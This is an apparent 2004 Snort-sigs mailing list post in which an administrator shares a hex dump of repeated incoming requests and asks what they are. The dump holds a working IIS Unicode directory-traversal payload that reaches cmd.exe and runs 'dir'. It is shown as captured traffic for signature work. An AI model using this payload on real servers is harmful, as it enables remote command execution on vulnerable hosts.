[Snort-sigs] Weird new CMD.EXE payload...

K. Jared Kalisz jkalisz at ...2550...
Wed Jun 16 07:32:05 EDT 2004


I'm seeing a lot of this this morning. Weird patterns too.. One attempt from
each source address They keep pouring in ...

Any thoughts??

000 : 67 65 74 20 2F 73 63 72 69 70 74 73 2F 2E 2E 25   get /scripts/..%
010 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
020 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
030 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2E 2E 25   c0%af..%c0%af..%
040 : 63 30 25 61 66 2E 2E 25 63 30 25 61 66 2F 77 69   c0%af..%c0%af/wi
050 : 6E 6E 74 2F 73 79 73 74 65 6D 33 32 2F 63 6D 64   nnt/system32/cmd
060 : 2E 65 78 65 3F 2F 63 25 32 30 64 69 72 0D 0A      .exe?/c%20dir..


Jared Kalisz
Prodika
1245 South Main Street, 2nd Floor
Grapevine, Texas
Tel 817.488.3080
Fax 817.488.7060







More information about the Snort-sigs mailing list